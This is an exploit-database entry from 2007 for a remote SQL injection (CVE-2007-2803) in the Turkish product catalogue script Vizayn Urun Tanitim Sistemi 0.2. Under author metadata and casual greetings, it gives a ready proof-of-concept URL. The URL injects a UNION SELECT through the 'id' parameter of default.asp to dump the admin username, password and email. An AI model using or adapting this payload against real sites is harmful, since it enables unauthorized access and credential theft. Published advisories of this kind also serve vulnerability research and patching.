Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection



EKU-ID: 11970 CVE: OSVDB-36232;CVE-2007-2803 OSVDB-ID:
Author: BAHADIR Published: 2007-05-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


/* Vizayn Urun Tanitim Sistemi v0.2 (tr) Remote SQL Injection Vulnerability
Found by : ertuqrul
PoC By : BAHADIR
Contact: bahadir@bsdmail.org
Scripr HomePage: http://www.vizayn.web.tr/ws.asp?ws=102
Script Demo URL: http://ws.vizaynhosting.com/V02/
Price : 55YTL

PoF Concept:
Http://[HOST]/[PATH]/default.asp?islem=haberdetay&id=-1%20union%20select%20USERNAME,PASSWORD,EMAIL,USERNAME%20from%20ADMIN
Takes admin username ,password and email adress from admin table

W0rdz:Maksat Birseyler Eklemek Olsun =)
GreetZ Goes To : BURCU (Her Ne Kadar Bilmesede :D ) Ayrica Dostum Erchin'e ( Ercin Kardesim, Warcraftin Amk. Birak Su Malak Oyunu :D )
and also to Str0ke For Posting :)
*/

# milw0rm.com [2007-05-30]